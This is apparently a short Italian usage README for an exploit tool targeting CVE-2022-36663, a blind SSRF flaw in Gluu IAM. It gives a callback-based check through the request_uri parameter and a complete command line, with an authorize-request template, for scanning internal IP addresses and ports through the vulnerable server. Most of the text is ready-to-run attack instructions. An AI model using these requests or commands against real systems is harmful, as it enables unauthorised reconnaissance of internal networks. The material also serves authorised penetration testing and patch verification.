
Scanner di rete interna tramite SSRF cieco su Gluu IAM
Scanner di rete interna tramite blind SSRF su Gluu IAM
Gluu IAM è vulnerabile a blind SSRF che può essere sfruttato per scansionare la rete interna alla ricerca di porte aperte in base ai tempi di risposta.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
Per verificare se il target è vulnerabile, aggiungi &request_uri=http://burpcollab alla richiesta /oxauth/restv1/authorize e verifica la presenza di traffico in arrivo dal server target.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - l'URL del server Gluu IAM
IP - L'indirizzo IP interno o la sottorete che si desidera scansionare
Port - La porta interna che si desidera scansionare
AR - L'URL della richiesta di autorizzazione che termina con una request_uri vuota
